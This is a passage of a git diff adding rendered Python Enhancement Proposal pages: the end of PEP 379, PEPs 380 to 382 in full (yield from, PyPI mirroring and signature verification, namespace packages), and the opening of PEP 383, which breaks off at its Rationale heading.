+    if node.body and isinstance(node.body[0], Expr) and \
+    isinstance(node.body[0].value, Str):
+        if clean:
+            import inspect
+            return inspect.cleandoc(node.body[0].value.s)
+        return node.body[0].value.s
+
+
+

Using assignment expression:

+
def get_docstring(node, clean=True):
+    if not isinstance(node, (FunctionDef, ClassDef, Module)):
+        raise TypeError("%r can't have docstrings"
+                            % node.__class__.__name__)
+    if node.body -> body and isinstance(body[0] -> elem, Expr) and \
+    isinstance(elem.value -> value, Str):
+        if clean:
+            import inspect
+            return inspect.cleandoc(value.s)
+        return value.s
+
+
+
+
+

Examples

+

The examples shown below highlight some of the desirable features +of the assignment expression, and some of the possible corner +cases.

+
    +
  1. Assignment in an if statement for use later:
    def expensive():
    +    import time; time.sleep(1)
    +    return 'spam'
    +
    +if expensive() -> res in ('spam', 'eggs'):
    +    dosomething(res)
    +
    +
    +
  2. +
  3. Assignment in a while loop clause:
    while len(expensive() -> res) == 4:
    +    dosomething(res)
    +
    +
    +
  4. +
  5. Keep the iterator object from the for loop:
    for ch in expensive() -> res:
    +    sell_on_internet(res)
    +
    +
    +
  6. +
  7. Corner case:
    for ch -> please_dont in expensive():
    +    pass
    +# who would want to do this? Not I.
    +
    +
    +
  8. +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0379.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0380/index.html b/pep-0380/index.html new file mode 100644 index 00000000000..68297aab90a --- /dev/null +++ b/pep-0380/index.html @@ -0,0 +1,548 @@ + + + + + + + + PEP 380 – Syntax for Delegating to a Subgenerator | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 380 – Syntax for Delegating to a Subgenerator

+
+
Author:
+
Gregory Ewing <greg.ewing at canterbury.ac.nz>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Feb-2009
+
Python-Version:
+
3.3
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

A syntax is proposed for a generator to delegate part of its +operations to another generator. This allows a section of code +containing ‘yield’ to be factored out and placed in another generator. +Additionally, the subgenerator is allowed to return with a value, and +the value is made available to the delegating generator.

+

The new syntax also opens up some opportunities for optimisation when +one generator re-yields values produced by another.

+
+
+

PEP Acceptance

+

Guido officially accepted the PEP on 26th June, 2011.

+
+
+

Motivation

+

A Python generator is a form of coroutine, but has the limitation that +it can only yield to its immediate caller. This means that a piece of +code containing a yield cannot be factored out and put into a +separate function in the same way as other code. Performing such a +factoring causes the called function to itself become a generator, and +it is necessary to explicitly iterate over this second generator and +re-yield any values that it produces.

+

If yielding of values is the only concern, this can be performed +without much difficulty using a loop such as

+
for v in g:
+    yield v
+
+
+

However, if the subgenerator is to interact properly with the caller +in the case of calls to send(), throw() and close(), +things become considerably more difficult. As will be seen later, the +necessary code is very complicated, and it is tricky to handle all the +corner cases correctly.

+

A new syntax will be proposed to address this issue. In the simplest +use cases, it will be equivalent to the above for-loop, but it will +also handle the full range of generator behaviour, and allow generator +code to be refactored in a simple and straightforward way.

+
+
+

Proposal

+

The following new expression syntax will be allowed in the body of a +generator:

+
yield from <expr>
+
+
+

where <expr> is an expression evaluating to an iterable, from which an +iterator is extracted. The iterator is run to exhaustion, during which +time it yields and receives values directly to or from the caller of +the generator containing the yield from expression (the +“delegating generator”).

+

Furthermore, when the iterator is another generator, the subgenerator +is allowed to execute a return statement with a value, and that +value becomes the value of the yield from expression.

+

The full semantics of the yield from expression can be described +in terms of the generator protocol as follows:

+
    +
  • Any values that the iterator yields are passed directly to the +caller.
  • +
  • Any values sent to the delegating generator using send() are +passed directly to the iterator. If the sent value is None, the +iterator’s __next__() method is called. If the sent value +is not None, the iterator’s send() method is called. If the +call raises StopIteration, the delegating generator is resumed. +Any other exception is propagated to the delegating generator.
  • +
  • Exceptions other than GeneratorExit thrown into the delegating +generator are passed to the throw() method of the iterator. +If the call raises StopIteration, the delegating generator is +resumed. Any other exception is propagated to the delegating +generator.
  • +
  • If a GeneratorExit exception is thrown into the delegating +generator, or the close() method of the delegating generator +is called, then the close() method of the iterator is called +if it has one. If this call results in an exception, it is +propagated to the delegating generator. Otherwise, +GeneratorExit is raised in the delegating generator.
  • +
  • The value of the yield from expression is the first argument +to the StopIteration exception raised by the iterator when +it terminates.
  • +
  • return expr in a generator causes StopIteration(expr) to +be raised upon exit from the generator.
  • +
+
+

Enhancements to StopIteration

+

For convenience, the StopIteration exception will be given a +value attribute that holds its first argument, or None if there +are no arguments.

+
+
+

Formal Semantics

+

Python 3 syntax is used in this section.

+
    +
  1. The statement
    RESULT = yield from EXPR
    +
    +
    +

    is semantically equivalent to

    +
    _i = iter(EXPR)
    +try:
    +    _y = next(_i)
    +except StopIteration as _e:
    +    _r = _e.value
    +else:
    +    while 1:
    +        try:
    +            _s = yield _y
    +        except GeneratorExit as _e:
    +            try:
    +                _m = _i.close
    +            except AttributeError:
    +                pass
    +            else:
    +                _m()
    +            raise _e
    +        except BaseException as _e:
    +            _x = sys.exc_info()
    +            try:
    +                _m = _i.throw
    +            except AttributeError:
    +                raise _e
    +            else:
    +                try:
    +                    _y = _m(*_x)
    +                except StopIteration as _e:
    +                    _r = _e.value
    +                    break
    +        else:
    +            try:
    +                if _s is None:
    +                    _y = next(_i)
    +                else:
    +                    _y = _i.send(_s)
    +            except StopIteration as _e:
    +                _r = _e.value
    +                break
    +RESULT = _r
    +
    +
    +
  2. +
  3. In a generator, the statement
    return value
    +
    +
    +

    is semantically equivalent to

    +
    raise StopIteration(value)
    +
    +
    +

    except that, as currently, the exception cannot be caught by +except clauses within the returning generator.

    +
  4. +
  5. The StopIteration exception behaves as though defined thusly:
    class StopIteration(Exception):
    +
    +    def __init__(self, *args):
    +        if len(args) > 0:
    +            self.value = args[0]
    +        else:
    +            self.value = None
    +        Exception.__init__(self, *args)
    +
    +
    +
  6. +
+
+
+
+

Rationale

+
+

The Refactoring Principle

+

The rationale behind most of the semantics presented above stems from +the desire to be able to refactor generator code. It should be +possible to take a section of code containing one or more yield +expressions, move it into a separate function (using the usual +techniques to deal with references to variables in the surrounding +scope, etc.), and call the new function using a yield from +expression.

+

The behaviour of the resulting compound generator should be, as far as +reasonably practicable, the same as the original unfactored generator +in all situations, including calls to __next__(), send(), +throw() and close().

+

The semantics in cases of subiterators other than generators has been +chosen as a reasonable generalization of the generator case.

+

The proposed semantics have the following limitations with regard to +refactoring:

+
    +
  • A block of code that catches GeneratorExit without subsequently +re-raising it cannot be factored out while retaining exactly the +same behaviour.
  • +
  • Factored code may not behave the same way as unfactored code if a +StopIteration exception is thrown into the delegating generator.
  • +
+

With use cases for these being rare to non-existent, it was not +considered worth the extra complexity required to support them.

+
+
+

Finalization

+

There was some debate as to whether explicitly finalizing the +delegating generator by calling its close() method while it is +suspended at a yield from should also finalize the subiterator. +An argument against doing so is that it would result in premature +finalization of the subiterator if references to it exist elsewhere.

+

Consideration of non-refcounting Python implementations led to the +decision that this explicit finalization should be performed, so that +explicitly closing a factored generator has the same effect as doing +so to an unfactored one in all Python implementations.

+

The assumption made is that, in the majority of use cases, the +subiterator will not be shared. The rare case of a shared subiterator +can be accommodated by means of a wrapper that blocks throw() and +close() calls, or by using a means other than yield from to +call the subiterator.

+
+
+

Generators as Threads

+

A motivation for generators being able to return values concerns the +use of generators to implement lightweight threads. When using +generators in that way, it is reasonable to want to spread the +computation performed by the lightweight thread over many functions. +One would like to be able to call a subgenerator as though it were an +ordinary function, passing it parameters and receiving a returned +value.

+

Using the proposed syntax, a statement such as

+
y = f(x)
+
+
+

where f is an ordinary function, can be transformed into a delegation +call

+
y = yield from g(x)
+
+
+

where g is a generator. One can reason about the behaviour of the +resulting code by thinking of g as an ordinary function that can be +suspended using a yield statement.

+

When using generators as threads in this way, typically one is not +interested in the values being passed in or out of the yields. +However, there are use cases for this as well, where the thread is +seen as a producer or consumer of items. The yield from +expression allows the logic of the thread to be spread over as many +functions as desired, with the production or consumption of items +occurring in any subfunction, and the items are automatically routed to +or from their ultimate source or destination.

+

Concerning throw() and close(), it is reasonable to expect +that if an exception is thrown into the thread from outside, it should +first be raised in the innermost generator where the thread is +suspended, and propagate outwards from there; and that if the thread +is terminated from outside by calling close(), the chain of active +generators should be finalised from the innermost outwards.

+
+
+

Syntax

+

The particular syntax proposed has been chosen as suggestive of its +meaning, while not introducing any new keywords and clearly standing +out as being different from a plain yield.

+
+
+

Optimisations

+

Using a specialised syntax opens up possibilities for optimisation +when there is a long chain of generators. Such chains can arise, for +instance, when recursively traversing a tree structure. The overhead +of passing __next__() calls and yielded values down and up the +chain can cause what ought to be an O(n) operation to become, in the +worst case, O(n**2).

+

A possible strategy is to add a slot to generator objects to hold a +generator being delegated to. When a __next__() or send() +call is made on the generator, this slot is checked first, and if it +is nonempty, the generator that it references is resumed instead. If +it raises StopIteration, the slot is cleared and the main generator is +resumed.

+

This would reduce the delegation overhead to a chain of C function +calls involving no Python code execution. A possible enhancement +would be to traverse the whole chain of generators in a loop and +directly resume the one at the end, although the handling of +StopIteration is more complicated then.

+
+
+

Use of StopIteration to return values

+

There are a variety of ways that the return value from the generator +could be passed back. Some alternatives include storing it as an +attribute of the generator-iterator object, or returning it as the +value of the close() call to the subgenerator. However, the +proposed mechanism is attractive for a couple of reasons:

+
    +
  • Using a generalization of the StopIteration exception makes it easy +for other kinds of iterators to participate in the protocol without +having to grow an extra attribute or a close() method.
  • +
  • It simplifies the implementation, because the point at which the +return value from the subgenerator becomes available is the same +point at which the exception is raised. Delaying until any later +time would require storing the return value somewhere.
  • +
+
+
+

Rejected Ideas

+

Some ideas were discussed but rejected.

+

Suggestion: There should be some way to prevent the initial call to +__next__(), or substitute it with a send() call with a specified +value, the intention being to support the use of generators wrapped so +that the initial __next__() is performed automatically.

+

Resolution: Outside the scope of the proposal. Such generators should +not be used with yield from.

+

Suggestion: If closing a subiterator raises StopIteration with a +value, return that value from the close() call to the delegating +generator.

+

The motivation for this feature is so that the end of a stream of +values being sent to a generator can be signalled by closing the +generator. The generator would catch GeneratorExit, finish its +computation and return a result, which would then become the return +value of the close() call.

+

Resolution: This usage of close() and GeneratorExit would be +incompatible with their current role as a bail-out and clean-up +mechanism. It would require that when closing a delegating generator, +after the subgenerator is closed, the delegating generator be resumed +instead of re-raising GeneratorExit. But this is not acceptable, +because it would fail to ensure that the delegating generator is +finalised properly in the case where close() is being called for +cleanup purposes.

+

Signalling the end of values to a consumer is better addressed by +other means, such as sending in a sentinel value or throwing in an +exception agreed upon by the producer and consumer. The consumer can +then detect the sentinel or exception and respond by finishing its +computation and returning normally. Such a scheme behaves correctly +in the presence of delegation.

+

Suggestion: If close() is not to return a value, then raise an +exception if StopIteration with a non-None value occurs.

+

Resolution: No clear reason to do so. Ignoring a return value is not +considered an error anywhere else in Python.

+
+
+
+

Criticisms

+

Under this proposal, the value of a yield from expression would be +derived in a very different way from that of an ordinary yield +expression. This suggests that some other syntax not containing the +word yield might be more appropriate, but no acceptable +alternative has so far been proposed. Rejected alternatives include +call, delegate and gcall.

+

It has been suggested that some mechanism other than return in the +subgenerator should be used to establish the value returned by the +yield from expression. However, this would interfere with the +goal of being able to think of the subgenerator as a suspendable +function, since it would not be able to return values in the same way +as other functions.

+

The use of an exception to pass the return value has been criticised +as an “abuse of exceptions”, without any concrete justification of +this claim. In any case, this is only one suggested implementation; +another mechanism could be used without losing any essential features +of the proposal.

+

It has been suggested that a different exception, such as +GeneratorReturn, should be used instead of StopIteration to return a +value. However, no convincing practical reason for this has been put +forward, and the addition of a value attribute to StopIteration +mitigates any difficulties in extracting a return value from a +StopIteration exception that may or may not have one. Also, using a +different exception would mean that, unlike ordinary functions, +‘return’ without a value in a generator would not be equivalent to +‘return None’.

+
+
+

Alternative Proposals

+

Proposals along similar lines have been made before, some using the +syntax yield * instead of yield from. While yield * is +more concise, it could be argued that it looks too similar to an +ordinary yield and the difference might be overlooked when reading +code.

+

To the author’s knowledge, previous proposals have focused only on +yielding values, and thereby suffered from the criticism that the +two-line for-loop they replace is not sufficiently tiresome to write +to justify a new syntax. By dealing with the full generator protocol, +this proposal provides considerably more benefit.

+
+
+

Additional Material

+

Some examples of the use of the proposed syntax are available, and +also a prototype implementation based on the first optimisation +outlined above.

+

Examples and Implementation

+

A version of the implementation updated for Python 3.3 is available from +tracker issue #11682

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0380.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0381/index.html b/pep-0381/index.html new file mode 100644 index 00000000000..ab919637cd3 --- /dev/null +++ b/pep-0381/index.html @@ -0,0 +1,487 @@ + + + + + + + + PEP 381 – Mirroring infrastructure for PyPI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 381 – Mirroring infrastructure for PyPI

+
+
Author:
+
Tarek Ziadé <tarek at ziade.org>, Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
21-Mar-2009
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a mirroring infrastructure for PyPI.

+
+
+

PEP Withdrawal

+

The main PyPI web service was moved behind the Fastly caching CDN in May 2013: +https://mail.python.org/pipermail/distutils-sig/2013-May/020848.html

+

Subsequently, this arrangement was formalised as an in-kind sponsorship with +the PSF, and the PSF has also taken on the task of risk management in the event +that that sponsorship arrangement were to ever cease.

+

The download statistics that were previously provided directly on PyPI, are now +published indirectly via Google Big Query: +https://packaging.python.org/guides/analyzing-pypi-package-downloads/

+

Accordingly, the mirroring proposal described in this PEP is no longer required, +and has been marked as Withdrawn.

+
+
+

Rationale

+

PyPI is hosting over 6000 projects and is used on a daily basis +by people to build applications. Especially systems like easy_install +and zc.buildout make intensive usage of PyPI.

+

For people making intensive use of PyPI, it can act as a single point +of failure. People have started to set up some mirrors, both private +and public. Those mirrors are active mirrors, which means that they +are browsing PyPI to get synced.

+

In order to make the system more reliable, this PEP describes:

+
    +
  • the mirror listing and registering at PyPI
  • +
  • the pages a public mirror should maintain. These pages will be used +by PyPI, in order to get hit counts and the last modified date.
  • +
  • how a mirror should synchronize with PyPI
  • +
  • how a client can implement a fail-over mechanism
  • +
+
+
+

Mirror listing and registering

+

People that wants to mirror PyPI make a proposal on catalog-SIG. +When a mirror is proposed on the mailing list, it is manually +added in a mirror list in the PyPI application after it +has been checked to be compliant with the mirroring rules.

+

The mirror list is provided as a list of host names of the +form

+
+
X.pypi.python.org
+

The values of X are the sequence a,b,c,…,aa,ab,… +a.pypi.python.org is the master server; the mirrors start +with b. A CNAME record last.pypi.python.org points to the +last host name. Mirror operators should use a static address, +and report planned changes to that address in advance to +distutils-sig.

+

The new mirror also appears at http://pypi.python.org/mirrors +which is a human-readable page that gives the list of mirrors. +This page also explains how to register a new mirror.

+
+

Statistics page

+

PyPI provides statistics on downloads at /stats. This page is +calculated daily by PyPI, by reading all mirrors’ local stats and +summing them.

+

The stats are presented in daily or monthly files, under /stats/days +and /stats/months. Each file is a bzip2 file with these formats:

+
    +
  • YYYY-MM-DD.bz2 for daily files
  • +
  • YYYY-MM.bz2 for monthly files
  • +
+

Examples:

+
    +
  • /stats/days/2008-11-06.bz2
  • +
  • /stats/days/2008-11-07.bz2
  • +
  • /stats/days/2008-11-08.bz2
  • +
  • /stats/months/2008-11.bz2
  • +
  • /stats/months/2008-10.bz2
  • +
+
+
+
+

Mirror Authenticity

+

With a distributed mirroring system, clients may want to verify that +the mirrored copies are authentic. There are multiple threats to +consider:

+
    +
  1. the central index may get compromised
  2. +
  3. the central index is assumed to be trusted, but the mirrors might +be tampered.
  4. +
  5. a man in the middle between the central index and the end user, +or between a mirror and the end user might tamper with datagrams.
  6. +
+

This specification only deals with the second threat. Some provisions +are made to detect man-in-the-middle attacks. To detect the first +attack, package authors need to sign their packages using PGP keys, so +that users verify that the package comes from the author they trust.

+

The central index provides a DSA key at the URL /serverkey, in the PEM +format as generated by “openssl dsa -pubout” (i.e. RFC 3280 +SubjectPublicKeyInfo, with the algorithm 1.3.14.3.2.12). This URL must +not be mirrored, and clients must fetch the official serverkey from +PyPI directly, or use the copy that came with the PyPI client software. +Mirrors should still download the key, to detect a key rollover.

+

For each package, a mirrored signature is provided at +/serversig/<package>. This is the DSA signature of the parallel URL +/simple/<package>, in DER form, using SHA-1 with DSA (i.e. as a +RFC 3279 Dsa-Sig-Value, created by algorithm 1.2.840.10040.4.3)

+

Clients using a mirror need to perform the following steps to verify +a package:

+
    +
  1. download the /simple page, and compute its SHA-1 hash
  2. +
  3. compute the DSA signature of that hash
  4. +
  5. download the corresponding /serversig, and compare it (byte-for-byte) +with the value computed in step 2.
  6. +
  7. compute and verify (against the /simple page) the MD-5 hashes +of all files they download from the mirror.
  8. +
+

An implementation of the verification algorithm is available from +https://svn.python.org/packages/trunk/pypi/tools/verify.py

+

Verification is not needed when downloading from central index, and +should be avoided to reduce the computation overhead.

+

About once a year, the key will be replaced with a new one. Mirrors +will have to re-fetch all /serversig pages. Clients using mirrors need +to find a trusted copy of the new server key. One way to obtain one +is to download it from https://pypi.python.org/serverkey. To detect +man-in-the-middle attacks, clients need to verify the SSL server +certificate, which will be signed by the CACert authority.

+
+
+

Special pages a mirror needs to provide

+

A mirror is a subset copy of PyPI, so it provides the same structure +by copying it.

+
    +
  • simple: rest version of the package index
  • +
  • packages: packages, stored by Python version, and letters
  • +
  • serversig: signatures for the simple pages
  • +
+

It also needs to provide two specific elements:

+
    +
  • last-modified
  • +
  • local-stats
  • +
+
+

Last modified date

+

CPAN uses a freshness date system where the mirror’s last +synchronisation date is made available.

+

For PyPI, each mirror needs to maintain a URL with simple text content +that represents the last synchronisation date the mirror maintains.

+

The date is provided in GMT time, using the ISO 8601 format [2]. +Each mirror will be responsible to maintain its last modified date.

+

This page must be located at : /last-modified and must be a +text/plain page.

+
+
+

Local statistics

+

Each mirror is responsible to count all the downloads that where done +via it. This is used by PyPI to sum up all downloads, to be able to +display the grand total.

+

These statistics are in CSV-like form, with a header in the first +line. It needs to obey PEP 305. Basically, it should be +readable by Python’s csv module.

+

The fields in this file are:

+
    +
  • package: the distutils id of the package.
  • +
  • filename: the filename that has been downloaded.
  • +
  • useragent: the User-Agent of the client that has downloaded the +package.
  • +
  • count: the number of downloads.
  • +
+

The content will look like this:

+
# package,filename,useragent,count
+zc.buildout,zc.buildout-1.6.0.tgz,MyAgent,142
+...
+
+
+

The counting starts the day the mirror is launched, and there is one +file per day, compressed using the bzip2 format. Each file is named +like the day. For example, 2008-11-06.bz2 is the file for the 6th of +November 2008.

+

They are then provided in a folder called days. For example:

+
    +
  • /local-stats/days/2008-11-06.bz2
  • +
  • /local-stats/days/2008-11-07.bz2
  • +
  • /local-stats/days/2008-11-08.bz2
  • +
+

This page must be located at /local-stats.

+
+
+
+

How a mirror should synchronize with PyPI

+

A mirroring protocol called Simple Index was described and +implemented by Martin v. Loewis and Jim Fulton, based on how +easy_install works. This section synthesizes it and gives a few +relevant links, plus a small part about User-Agent.

+
+

The mirroring protocol

+

Mirrors must reduce the amount of data transferred between the central +server and the mirror. To achieve that, they MUST use the changelog() +PyPI XML-RPC call, and only refetch the packages that have been +changed since the last time. For each package P, they MUST copy +documents /simple/P/ and /serversig/P. If a package is deleted on the +central server, they MUST delete the package and all associated files. +To detect modification of package files, they MAY cache the file’s +ETag, and MAY request skipping it using the If-none-match header.

+

Each mirroring tool MUST identify itself using a descripte User-agent +header.

+

The pep381client package [1] provides an application that +respects this protocol to browse PyPI.

+
+
+

User-agent request header

+

In order to be able to differentiate actions taken by clients over +PyPI, a specific user agent name should be provided by all mirroring +software.

+

This is also true for all clients like:

+
    +
  • zc.buildout [3].
  • +
  • setuptools [4].
  • +
  • pip [5].
  • +
+

XXX user agent registering mechanism at PyPI ?

+
+
+

How a client can use PyPI and its mirrors

+

Clients that are browsing PyPI should be able to use alternative +mirrors, by getting the list of the mirrors using last.pypi.python.org.

+

Code example:

+
>>> import socket
+>>> socket.gethostbyname_ex('last.pypi.python.org')[0]
+'h.pypi.python.org'
+
+
+

The clients so far that could use this mechanism:

+
    +
  • setuptools
  • +
  • zc.buildout (through setuptools)
  • +
  • pip
  • +
+
+
+

Fail-over mechanism

+

Clients that are browsing PyPI should be able to use a fail-over +mechanism when PyPI or the used mirror is not responding.

+

It is up to the client to decide which mirror should be used, maybe by +looking at its geographical location and its responsiveness.

+

This PEP does not describe how this fail-over mechanism should work, +but it is strongly encouraged that the clients try to use the nearest +mirror.

+

The clients so far that could use this mechanism:

+
    +
  • setuptools
  • +
  • zc.buildout (through setuptools)
  • +
  • pip
  • +
+
+
+

Extra package indexes

+

It is obvious that some packages will not be uploaded to PyPI, whether +because they are private or whether because the project maintainer +runs their own server where people might get the project package. +However, it is strongly encouraged that a public package index follows +PyPI and Distutils protocols.

+

In other words, the register and upload command should be +compatible with any package index server out there.

+

Software that are compatible with PyPI and Distutils so far:

+
    +
  • PloneSoftwareCenter [6] which is used to run plone.org products section.
  • +
  • EggBasket [7].
  • +
+

An extra package index is not a mirror of PyPI, but can have some +mirrors itself.

+
+
+

Merging several indexes

+

When a client needs to get some packages from several distinct +indexes, it should be able to use each one of them as a potential +source of packages. Different indexes should be defined as a sorted +list for the client to look for a package.

+

Each independent index can of course provide a list of its mirrors.

+

XXX define how to get the hostname for the mirrors of an arbitrary +index.

+

That permits all combinations at client level, for a reliable +packaging system with all levels of privacy.

+

It is up the client to deal with the merging.

+
+
+
+

References

+ +
+
+

Acknowledgments

+

Georg Brandl.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0381.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0382/index.html b/pep-0382/index.html new file mode 100644 index 00000000000..4aa4c88caea --- /dev/null +++ b/pep-0382/index.html @@ -0,0 +1,332 @@ + + + + + + + + PEP 382 – Namespace Packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 382 – Namespace Packages

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
02-Apr-2009
+
Python-Version:
+
3.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

On the first day of sprints at US PyCon 2012 we had a long and +fruitful discussion about PEP 382 and PEP 402. We ended up rejecting +both but a new PEP will be written to carry on in the spirit of PEP +402. Martin von Löwis wrote up a summary: [2].

+
+
+

Abstract

+

Namespace packages are a mechanism for splitting a single Python +package across multiple directories on disk. In current Python +versions, an algorithm to compute the packages __path__ must be +formulated. With the enhancement proposed here, the import machinery +itself will construct the list of directories that make up the +package. An implementation of this PEP is available at [1].

+
+
+

Terminology

+

Within this PEP, the term package refers to Python packages as defined +by Python’s import statement. The term distribution refers to +separately installable sets of Python modules as stored in the Python +package index, and installed by distutils or setuptools. The term +vendor package refers to groups of files installed by an operating +system’s packaging mechanism (e.g. Debian or Redhat packages install +on Linux systems).

+

The term portion refers to a set of files in a single directory (possibly +stored in a zip file) that contribute to a namespace package.

+
+
+

Namespace packages today

+

Python currently provides the pkgutil.extend_path to denote a package as +a namespace package. The recommended way of using it is to put:

+
from pkgutil import extend_path
+__path__ = extend_path(__path__, __name__)
+
+
+

in the package’s __init__.py. Every distribution needs to provide +the same contents in its __init__.py, so that extend_path is +invoked independent of which portion of the package gets imported +first. As a consequence, the package’s __init__.py cannot +practically define any names as it depends on the order of the package +fragments on sys.path which portion is imported first. As a special +feature, extend_path reads files named <packagename>.pkg which +allow to declare additional portions.

+

setuptools provides a similar function pkg_resources.declare_namespace +that is used in the form:

+
import pkg_resources
+pkg_resources.declare_namespace(__name__)
+
+
+

In the portion’s __init__.py, no assignment to __path__ is necessary, +as declare_namespace modifies the package __path__ through sys.modules. +As a special feature, declare_namespace also supports zip files, and +registers the package name internally so that future additions to sys.path +by setuptools can properly add additional portions to each package.

+

setuptools allows declaring namespace packages in a distribution’s +setup.py, so that distribution developers don’t need to put the +magic __path__ modification into __init__.py themselves.

+
+
+

Rationale

+

The current imperative approach to namespace packages has lead to +multiple slightly-incompatible mechanisms for providing namespace +packages. For example, pkgutil supports *.pkg files; setuptools +doesn’t. Likewise, setuptools supports inspecting zip files, and +supports adding portions to its _namespace_packages variable, whereas +pkgutil doesn’t.

+

In addition, the current approach causes problems for system vendors. +Vendor packages typically must not provide overlapping files, and an +attempt to install a vendor package that has a file already on disk +will fail or cause unpredictable behavior. As vendors might chose to +package distributions such that they will end up all in a single +directory for the namespace package, all portions would contribute +conflicting __init__.py files.

+
+
+

Specification

+

Rather than using an imperative mechanism for importing packages, a +declarative approach is proposed here: A directory whose name ends +with .pyp (for Python package) contains a portion of a package.

+

The import statement is extended so that computes the package’s +__path__ attribute for a package named P as consisting of +optionally a single directory name P containing a file +__init__.py, plus all directories named P.pyp, in the order in +which they are found in the parent’s package __path__ (or +sys.path). If either of these are found, search for additional +portions of the package continues.

+

A directory may contain both a package in the P/__init__.py and +the P.pyp form.

+

No other change to the importing mechanism is made; searching modules +(including __init__.py) will continue to stop at the first module +encountered. In summary, the process import a package foo works like +this:

+
    +
  1. sys.path is searched for directories foo or foo.pyp, or a file foo.<ext>. +If a file is found and no directory, it is treated as a module, and imported.
  2. +
  3. If a directory foo is found, a check is made whether it contains __init__.py. +If so, the location of the __init__.py is remembered. Otherwise, the directory +is skipped. Once an __init__.py is found, further directories called foo are +skipped.
  4. +
  5. For both directories foo and foo.pyp, the directories are added to the package’s +__path__.
  6. +
  7. If an __init__ module was found, it is imported, with __path__ +being initialized to the path computed all .pyp directories.
  8. +
+
+

Impact on Import Hooks

+

Both loaders and finders as defined in PEP 302 will need to be changed +to support namespace packages. Failure to conform to the protocol +below might cause a package not being recognized as a namespace +package; loaders and finders not supporting this protocol must raise +AttributeError when the functions below get accessed.

+

Finders need to support looking for *.pth files in step 1 of above +algorithm. To do so, a finder used as a path hook must support a +method:

+
+
finder.find_package_portion(fullname)
+

This method will be called in the same manner as find_module, and it +must return a string to be added to the package’s __path__. +If the finder doesn’t find a portion of the package, it shall return +None. Raising AttributeError from above call will be treated +as non-conformance with this PEP, and the exception will be ignored. +All other exceptions are reported.

+

A finder may report both success from find_module and from +find_package_portion, allowing for both a package containing +an __init__.py and a portion of the same package.

+

All strings returned from find_package_portion, along with all +path names of .pyp directories are added to the new package’s +__path__.

+
+
+
+

Discussion

+

Original versions of this specification proposed the addition of +*.pth files, similar to the way those files are used on sys.path. +With a wildcard marker (*), a package could indicate that the +entire path is derived by looking at the parent path, searching for +properly-named subdirectories.

+

People then observed that the support for the full .pth syntax is +inappropriate, and the .pth files were changed to be mere marker +files, indicating that a directories is a package. Peter Tröger +suggested that .pth is an unsuitable file extension, as all file +extensions related to Python should start with .py. Therefore, the +marker file was renamed to be .pyp.

+

Dinu Gherman then observed that using a marker file is not necessary, +and that a directory extension could well serve as a such as a +marker. This is what this PEP currently proposes.

+

Phillip Eby designed PEP 402 as an alternative approach to this PEP, +after comparing Python’s package syntax with that found in other +languages. PEP 402 proposes not to use a marker file at all. At the +discussion at PyCon DE 2011, people remarked that having an explicit +declaration of a directory as contributing to a package is a desirable +property, rather than an obstacle. In particular, Jython developers +noticed that Jython could easily mistake a directory that is a Java +package as being a Python package, if there is no need to declare +Python packages.

+

Packages can stop filling out the namespace package’s __init__.py. As +a consequence, extend_path and declare_namespace become obsolete.

+

Namespace packages can start providing non-trivial __init__.py +implementations; to do so, it is recommended that a single distribution +provides a portion with just the namespace package’s __init__.py +(and potentially other modules that belong to the namespace package +proper).

+

The mechanism is mostly compatible with the existing namespace +mechanisms. extend_path will be adjusted to this specification; +any other mechanism might cause portions to get added twice to +__path__.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0382.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0383/index.html b/pep-0383/index.html new file mode 100644 index 00000000000..b401ec4220e --- /dev/null +++ b/pep-0383/index.html @@ -0,0 +1,287 @@ + + + + + + + + PEP 383 – Non-decodable Bytes in System Character Interfaces | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 383 – Non-decodable Bytes in System Character Interfaces

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
22-Apr-2009
+
Python-Version:
+
3.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

File names, environment variables, and command line arguments are +defined as being character data in POSIX; the C APIs however allow +passing arbitrary bytes - whether these conform to a certain encoding +or not. This PEP proposes a means of dealing with such irregularities +by embedding the bytes in character strings in such a way that allows +recreation of the original byte string.

+
+
+

Rationale

+

